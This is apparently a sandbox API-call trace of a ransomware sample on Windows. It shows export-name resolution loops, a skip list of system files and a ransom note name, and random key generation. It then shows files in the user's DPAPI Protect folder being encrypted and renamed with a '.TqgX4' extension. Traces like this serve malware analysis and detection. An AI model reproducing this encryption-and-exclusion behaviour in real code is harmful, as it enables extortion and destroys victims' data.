returned="DeleteBoundaryDescriptor" [0078.370] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.370] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.370] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.370] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.370] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.370] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.370] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.370] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.370] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.370] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.371] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.371] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.371] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.371] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.371] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.371] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.371] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.372] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.372] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.372] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.372] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.372] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.372] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.372] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.372] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.372] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.372] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.372] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.372] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.372] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.372] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.372] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.372] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.372] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.372] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.372] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.373] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 147 [0078.373] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4") returned 153 [0078.373] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.tqgx4"), dwFlags=0x0) returned 1 [0078.373] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.374] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.374] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.374] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542b0350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542b0350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x542b0350, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="2be989a0-16a1-424b-9211-51aa3bb43e5d", cAlternateFileName="2BE989~1")) returned 1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="DECRYPT-FILES.txt") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="autorun.inf") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="boot.ini") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="desktop.ini") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="ntuser.dat") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="iconcache.db") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="bootsect.bak") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="ntuser.dat.log") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="thumbs.db") returned -1 [0078.374] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Bootfont.bin") returned -1 [0078.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.374] lstrlenW (lpString="2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 36 [0078.374] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="2be989a0-16a1-424b-9211-51aa3bb43e5d" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" [0078.375] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.376] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.376] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.376] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.376] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.376] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.376] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.376] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.377] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.377] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.377] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.378] CloseHandle (hObject=0x45c) returned 1 [0078.378] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.378] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.378] CloseHandle (hObject=0x0) returned 0 [0078.379] CloseHandle (hObject=0x458) returned 1 [0078.379] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.379] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.380] GetTickCount () returned 0x114c17c [0078.380] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.380] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.380] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.380] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.380] lstrlenA (lpString="kernel32.dll") returned 12 [0078.381] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.381] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.381] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.381] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.381] lstrlenA (lpString="ADDATOMA") returned 8 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.381] lstrlenA (lpString="ADDATOMW") returned 8 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.381] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.381] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.381] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.381] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.381] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.381] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.381] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.381] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.381] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.381] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.382] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.382] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.382] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.382] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.382] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.382] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.382] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.382] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.382] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.382] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.382] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.382] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.382] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.382] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.382] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.382] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.382] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.382] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.382] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.382] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.383] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.383] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.383] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.383] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.383] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.383] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.383] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.383] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.383] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.383] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.383] 